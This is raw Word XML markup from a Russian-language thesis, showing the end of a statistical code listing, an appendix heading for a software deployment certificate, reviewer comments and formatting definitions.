          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32874DD8"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sidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC22A58"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p>
    <w:p w14:paraId="32DF2166"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B7319" w14:textId="68132091" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="128AF8FE" w14:textId="1777EB15" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc162709252"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ Е (Справка о внедрении программного продукта на предприятии</w:t>
      </w:r>
      <w:r w:rsidRPr="00B549DB">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="40D53F28" w14:textId="033C075E" w:rsidR="0093378B" w:rsidRPr="00A91EEC" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F34617" wp14:editId="3A06A398">
            <wp:extent cx="5762846" cy="809694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65276" cy="8100354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0093378B" w:rsidRPr="00A91EEC" w:rsidSect="00A365F8">
      <w:footerReference w:type="default" r:id="rId73"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgNumType w:start="1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8" w:author="Sergey Medvedev" w:date="2024-03-18T01:49:00Z" w:initials="MSA">
    <w:p w14:paraId="77105A15" w14:textId="77777777" w:rsidR="00837F65" w:rsidRDefault="00837F65">
      <w:pPr>
        <w:pStyle w:val="af1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Может, об этом лучше попозже, потому что эта тема не понятна без пояснения для непосвящённых?</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="21" w:author="Sergey Medvedev" w:date="2024-03-18T01:53:00Z" w:initials="MSA">
    <w:p w14:paraId="44ADABDB" w14:textId="77777777" w:rsidR="00BC1FD1" w:rsidRDefault="00BC1FD1" w:rsidP="00BC1FD1">
      <w:pPr>
        <w:pStyle w:val="af1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Хотя бы в двух словах надо написать, что это за тест</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7105A15" w15:done="1"/>
  <w15:commentEx w15:paraId="44ADABDB" w15:done="1"/>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7105A15" w16cid:durableId="29A21BD6"/>
  <w16cid:commentId w16cid:paraId="44ADABDB" w16cid:durableId="29A21D1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50E65F" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC6" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA27200" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC6"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="262E1304" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC6" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C3919" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC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CC"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Cascadia Mono">
    <w:panose1 w:val="020B0609020000020004"/>
    <w:charset w:val="CC"/>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B09AAA" w14:textId="77777777" w:rsidR="00837F65" w:rsidRDefault="00837F65" w:rsidP="00505306">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="702A5E8C" w14:textId="77777777" w:rsidR="00837F65" w:rsidRDefault="00837F65">
    <w:pPr>
      <w:pStyle w:val="a5"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="247A0531" w14:textId="77777777" w:rsidR="00837F65" w:rsidRDefault="00837F6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252FB" w14:textId="77777777" w:rsidR="00837F65" w:rsidRDefault="00837F65" w:rsidP="00505306">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00432F87">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>73</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="19F63F87" w14:textId="77777777" w:rsidR="00837F65" w:rsidRDefault="00837F65">
    <w:pPr>
      <w:pStyle w:val="a5"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="16EFD771" w14:textId="77777777" w:rsidR="00837F65" w:rsidRDefault="00837F6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F9EA0E" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC6" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28950E67" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC6"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7EF376C7" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC6" w:rsidP="00505306">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D20B13E" w14:textId="77777777" w:rsidR="00B93EC6" w:rsidRDefault="00B93EC6"/>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A3B3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D605FF0"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11324DC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40F69E94"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="13445CCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDACAF68"/>
    <w:lvl w:ilvl="0" w:tplc="99B085D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"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5505888"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28141490"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2B424100"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4987E1E"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"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D4F3D3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38CC615A"/>
    <w:lvl w:ilvl="0" w:tplc="04190001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2185" w:hanging="396"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="72685DA4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3049" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40C1633A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE5467DA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1129" w:hanging="42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5694" w:hanging="144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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="446B7E73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1A82F44"/>
    <w:lvl w:ilvl="0" w:tplc="DA4E8916">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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62831057"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2550C78C"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="64055C2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="500065D4"/>
    <w:lvl w:ilvl="0" w:tplc="9D32FCC8">
      <w:start w:val="5"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1069" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04190003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1789" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="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hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04190005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6829" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6A910D49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6087E2E"/>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9D6CA500">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1495" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CD16269"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68783FBE"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="76015D1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E64D1C8"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"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num w:numId="1">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="12"/>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2810"/>
    <w:rsid w:val="00001A06"/>
    <w:rsid w:val="00002242"/>
    <w:rsid w:val="00005746"/>
    <w:rsid w:val="00014899"/>
    <w:rsid w:val="0001673A"/>
    <w:rsid w:val="00021D09"/>
    <w:rsid w:val="00025A1F"/>
    <w:rsid w:val="00026012"/>
    <w:rsid w:val="000334BA"/>
    <w:rsid w:val="000353BE"/>
    <w:rsid w:val="00040A09"/>
    <w:rsid w:val="00041FE1"/>
    <w:rsid w:val="000428D1"/>
    <w:rsid w:val="000436C1"/>
    <w:rsid w:val="00046642"/>
    <w:rsid w:val="000550A6"/>
    <w:rsid w:val="00061001"/>
    <w:rsid w:val="00063531"/>
    <w:rsid w:val="0006497F"/>
    <w:rsid w:val="0006547C"/>
    <w:rsid w:val="000671FA"/>
    <w:rsid w:val="00077C49"/>
    <w:rsid w:val="00084743"/>
    <w:rsid w:val="00087DE3"/>
    <w:rsid w:val="00090903"/>
    <w:rsid w:val="000A1C3C"/>
    <w:rsid w:val="000A1EC6"/>
    <w:rsid w:val="000B6946"/>
    <w:rsid w:val="000C7560"/>
    <w:rsid w:val="000D039E"/>
    <w:rsid w:val="000D390F"/>
    <w:rsid w:val="000D7299"/>
    <w:rsid w:val="000E17DE"/>
    <w:rsid w:val="000E77B9"/>
    <w:rsid w:val="000E7943"/>
    <w:rsid w:val="000F55F8"/>
    <w:rsid w:val="000F569D"/>
    <w:rsid w:val="0010002C"/>
    <w:rsid w:val="00107CA1"/>
    <w:rsid w:val="00107F22"/>
    <w:rsid w:val="00112081"/>
    <w:rsid w:val="00112241"/>
    <w:rsid w:val="00115C66"/>
    <w:rsid w:val="00123B74"/>
    <w:rsid w:val="00127B20"/>
    <w:rsid w:val="00127D54"/>
    <w:rsid w:val="00130044"/>
    <w:rsid w:val="00141D08"/>
    <w:rsid w:val="001459F3"/>
    <w:rsid w:val="00146663"/>
    <w:rsid w:val="0014691C"/>
    <w:rsid w:val="00146AB3"/>
    <w:rsid w:val="00147383"/>
    <w:rsid w:val="00150043"/>
    <w:rsid w:val="0015133F"/>
    <w:rsid w:val="00152208"/>
    <w:rsid w:val="00156CDD"/>
    <w:rsid w:val="001601F5"/>
    <w:rsid w:val="00167D97"/>
    <w:rsid w:val="00176F8F"/>
    <w:rsid w:val="00177FE1"/>
    <w:rsid w:val="00181E5B"/>
    <w:rsid w:val="00182728"/>
    <w:rsid w:val="00185792"/>
    <w:rsid w:val="001A0C04"/>
    <w:rsid w:val="001A2020"/>
    <w:rsid w:val="001A5E89"/>
    <w:rsid w:val="001B3E96"/>
    <w:rsid w:val="001B4341"/>
    <w:rsid w:val="001B5D43"/>
    <w:rsid w:val="001C0E55"/>
    <w:rsid w:val="001C2965"/>
    <w:rsid w:val="001C29A8"/>
    <w:rsid w:val="001D6A39"/>
    <w:rsid w:val="001E06AA"/>
    <w:rsid w:val="001E5444"/>
    <w:rsid w:val="001F04F3"/>
    <w:rsid w:val="001F2617"/>
    <w:rsid w:val="001F2AD4"/>
    <w:rsid w:val="001F2D74"/>
    <w:rsid w:val="001F4987"/>
    <w:rsid w:val="001F4989"/>
    <w:rsid w:val="001F5DAE"/>
    <w:rsid w:val="001F707C"/>
    <w:rsid w:val="001F7A02"/>
    <w:rsid w:val="00205C36"/>
    <w:rsid w:val="0020695B"/>
    <w:rsid w:val="002101AB"/>
    <w:rsid w:val="002213CB"/>
    <w:rsid w:val="00224738"/>
    <w:rsid w:val="002334D1"/>
    <w:rsid w:val="002352FC"/>
    <w:rsid w:val="002407BF"/>
    <w:rsid w:val="00240E90"/>
    <w:rsid w:val="00240EF2"/>
    <w:rsid w:val="002417A4"/>
    <w:rsid w:val="00242D28"/>
    <w:rsid w:val="0024650C"/>
    <w:rsid w:val="00246A9D"/>
    <w:rsid w:val="0025430B"/>
    <w:rsid w:val="002575FA"/>
    <w:rsid w:val="002606B4"/>
    <w:rsid w:val="002620AC"/>
    <w:rsid w:val="00264D60"/>
    <w:rsid w:val="0026511D"/>
    <w:rsid w:val="00267DD0"/>
    <w:rsid w:val="00267F12"/>
    <w:rsid w:val="002747E5"/>
    <w:rsid w:val="00274AAD"/>
    <w:rsid w:val="00277ABE"/>
    <w:rsid w:val="00281AB2"/>
    <w:rsid w:val="00282062"/>
    <w:rsid w:val="00284702"/>
    <w:rsid w:val="0029195D"/>
    <w:rsid w:val="0029731F"/>
    <w:rsid w:val="002A0DC9"/>
    <w:rsid w:val="002B0300"/>
    <w:rsid w:val="002B109D"/>
    <w:rsid w:val="002B2CF3"/>
    <w:rsid w:val="002C09BA"/>
    <w:rsid w:val="002D1FD2"/>
    <w:rsid w:val="002D6F72"/>
    <w:rsid w:val="002E2128"/>
    <w:rsid w:val="002E3AE2"/>
    <w:rsid w:val="002E57B7"/>
    <w:rsid w:val="002E5DD5"/>
    <w:rsid w:val="002F67A2"/>
    <w:rsid w:val="002F72FB"/>
    <w:rsid w:val="002F75C4"/>
    <w:rsid w:val="002F7B64"/>
    <w:rsid w:val="0030566A"/>
    <w:rsid w:val="0032071D"/>
    <w:rsid w:val="00322110"/>
    <w:rsid w:val="00322FB8"/>
    <w:rsid w:val="003263A5"/>
    <w:rsid w:val="00326BB6"/>
    <w:rsid w:val="003329B8"/>
    <w:rsid w:val="00332DCA"/>
    <w:rsid w:val="0033501A"/>
    <w:rsid w:val="003449D9"/>
    <w:rsid w:val="003449E6"/>
    <w:rsid w:val="00350B8A"/>
    <w:rsid w:val="003516D7"/>
    <w:rsid w:val="00354907"/>
    <w:rsid w:val="003629E8"/>
    <w:rsid w:val="00370ED0"/>
    <w:rsid w:val="00370FD7"/>
    <w:rsid w:val="00374416"/>
    <w:rsid w:val="00375119"/>
    <w:rsid w:val="003873A3"/>
    <w:rsid w:val="0039182D"/>
    <w:rsid w:val="003921AD"/>
    <w:rsid w:val="003921D2"/>
    <w:rsid w:val="003923BD"/>
    <w:rsid w:val="00396AAE"/>
    <w:rsid w:val="003A0DE4"/>
    <w:rsid w:val="003A3049"/>
    <w:rsid w:val="003A3636"/>
    <w:rsid w:val="003A41B1"/>
    <w:rsid w:val="003B0BDC"/>
    <w:rsid w:val="003B28BD"/>
    <w:rsid w:val="003B38D3"/>
    <w:rsid w:val="003C0A79"/>
    <w:rsid w:val="003C43F0"/>
    <w:rsid w:val="003D282A"/>
    <w:rsid w:val="003D2BA6"/>
    <w:rsid w:val="003E3F21"/>
    <w:rsid w:val="003E5C5F"/>
    <w:rsid w:val="003F0EAF"/>
    <w:rsid w:val="003F1515"/>
    <w:rsid w:val="003F5A28"/>
    <w:rsid w:val="003F71C9"/>
    <w:rsid w:val="0040023D"/>
    <w:rsid w:val="00402520"/>
    <w:rsid w:val="00403FE8"/>
    <w:rsid w:val="00405FFF"/>
    <w:rsid w:val="0041224D"/>
    <w:rsid w:val="004177C2"/>
    <w:rsid w:val="0042608C"/>
    <w:rsid w:val="0042767C"/>
    <w:rsid w:val="00432F87"/>
    <w:rsid w:val="00433551"/>
    <w:rsid w:val="00434B16"/>
    <w:rsid w:val="0043580C"/>
    <w:rsid w:val="004363A1"/>
    <w:rsid w:val="00451712"/>
    <w:rsid w:val="00451C5F"/>
    <w:rsid w:val="00452770"/>
    <w:rsid w:val="0045581F"/>
    <w:rsid w:val="00461F77"/>
    <w:rsid w:val="004626BE"/>
    <w:rsid w:val="00463F70"/>
    <w:rsid w:val="00464AEF"/>
    <w:rsid w:val="004717C9"/>
    <w:rsid w:val="00471C42"/>
    <w:rsid w:val="0047248E"/>
    <w:rsid w:val="004733EF"/>
    <w:rsid w:val="004739DE"/>
    <w:rsid w:val="00473E0B"/>
    <w:rsid w:val="00473F63"/>
    <w:rsid w:val="004752DB"/>
    <w:rsid w:val="00475D6F"/>
    <w:rsid w:val="004802A1"/>
    <w:rsid w:val="004804AD"/>
    <w:rsid w:val="004848F1"/>
    <w:rsid w:val="00485415"/>
    <w:rsid w:val="004930B2"/>
    <w:rsid w:val="004971B4"/>
    <w:rsid w:val="00497895"/>
    <w:rsid w:val="004A1170"/>
    <w:rsid w:val="004A2370"/>
    <w:rsid w:val="004A2DC3"/>
    <w:rsid w:val="004A3F2E"/>
    <w:rsid w:val="004A45F4"/>
    <w:rsid w:val="004A4E6E"/>
    <w:rsid w:val="004B3C0C"/>
    <w:rsid w:val="004B6D8A"/>
    <w:rsid w:val="004B746E"/>
    <w:rsid w:val="004C1501"/>
    <w:rsid w:val="004D038C"/>
    <w:rsid w:val="004D118E"/>
    <w:rsid w:val="004D17E2"/>
    <w:rsid w:val="004D222C"/>
    <w:rsid w:val="004D37C5"/>
    <w:rsid w:val="004D3E4B"/>
    <w:rsid w:val="004D79A4"/>
    <w:rsid w:val="004E1DBB"/>
    <w:rsid w:val="004E3DA9"/>
    <w:rsid w:val="004E519B"/>
    <w:rsid w:val="004E6B80"/>
    <w:rsid w:val="004F2BD3"/>
    <w:rsid w:val="004F5453"/>
    <w:rsid w:val="004F5C8D"/>
    <w:rsid w:val="00500C51"/>
    <w:rsid w:val="005019EA"/>
    <w:rsid w:val="00502B63"/>
    <w:rsid w:val="00502C9D"/>
    <w:rsid w:val="0050400D"/>
    <w:rsid w:val="005050D8"/>
    <w:rsid w:val="00505306"/>
    <w:rsid w:val="00505DD4"/>
    <w:rsid w:val="00505F17"/>
    <w:rsid w:val="00510BCA"/>
    <w:rsid w:val="00513BFA"/>
    <w:rsid w:val="00514859"/>
    <w:rsid w:val="00523DAF"/>
    <w:rsid w:val="005248F5"/>
    <w:rsid w:val="00530632"/>
    <w:rsid w:val="00531AB7"/>
    <w:rsid w:val="005356FB"/>
    <w:rsid w:val="005417D4"/>
    <w:rsid w:val="00541C36"/>
    <w:rsid w:val="005428F7"/>
    <w:rsid w:val="00547D19"/>
    <w:rsid w:val="00553848"/>
    <w:rsid w:val="0056476A"/>
    <w:rsid w:val="00573B46"/>
    <w:rsid w:val="00574203"/>
    <w:rsid w:val="00584880"/>
    <w:rsid w:val="005857B1"/>
    <w:rsid w:val="00585AC7"/>
    <w:rsid w:val="005924E5"/>
    <w:rsid w:val="00596370"/>
    <w:rsid w:val="00597351"/>
    <w:rsid w:val="00597917"/>
    <w:rsid w:val="005A31AD"/>
    <w:rsid w:val="005A39EB"/>
    <w:rsid w:val="005A5E0B"/>
    <w:rsid w:val="005B14B0"/>
    <w:rsid w:val="005B2490"/>
    <w:rsid w:val="005B41D0"/>
    <w:rsid w:val="005B6D8D"/>
    <w:rsid w:val="005C1D63"/>
    <w:rsid w:val="005D0EAE"/>
    <w:rsid w:val="005D1082"/>
    <w:rsid w:val="005D32D9"/>
    <w:rsid w:val="005D410A"/>
    <w:rsid w:val="005D58E5"/>
    <w:rsid w:val="005E2387"/>
    <w:rsid w:val="005F0B28"/>
    <w:rsid w:val="005F0C5C"/>
    <w:rsid w:val="005F303E"/>
    <w:rsid w:val="005F4CD1"/>
    <w:rsid w:val="005F4E71"/>
    <w:rsid w:val="005F6605"/>
    <w:rsid w:val="006142CA"/>
    <w:rsid w:val="00617604"/>
    <w:rsid w:val="00635D49"/>
    <w:rsid w:val="006373B7"/>
    <w:rsid w:val="006378A4"/>
    <w:rsid w:val="00641037"/>
    <w:rsid w:val="00642642"/>
    <w:rsid w:val="00646613"/>
    <w:rsid w:val="00650066"/>
    <w:rsid w:val="0065368D"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="00661900"/>
    <w:rsid w:val="0066369B"/>
    <w:rsid w:val="0066379F"/>
    <w:rsid w:val="006700C7"/>
    <w:rsid w:val="00670681"/>
    <w:rsid w:val="00673530"/>
    <w:rsid w:val="00674F9F"/>
    <w:rsid w:val="00675B13"/>
    <w:rsid w:val="006827BE"/>
    <w:rsid w:val="00682EF1"/>
    <w:rsid w:val="006830F2"/>
    <w:rsid w:val="00684E96"/>
    <w:rsid w:val="0069122A"/>
    <w:rsid w:val="00696789"/>
    <w:rsid w:val="006A0B52"/>
    <w:rsid w:val="006A0DCC"/>
    <w:rsid w:val="006A2286"/>
    <w:rsid w:val="006A246D"/>
    <w:rsid w:val="006A4F48"/>
    <w:rsid w:val="006A6638"/>
    <w:rsid w:val="006A7942"/>
    <w:rsid w:val="006B109F"/>
    <w:rsid w:val="006C3A3B"/>
    <w:rsid w:val="006D26E6"/>
    <w:rsid w:val="006D3BD5"/>
    <w:rsid w:val="006D5190"/>
    <w:rsid w:val="006E14B4"/>
    <w:rsid w:val="006E1D7A"/>
    <w:rsid w:val="006E2FB9"/>
    <w:rsid w:val="006F3B28"/>
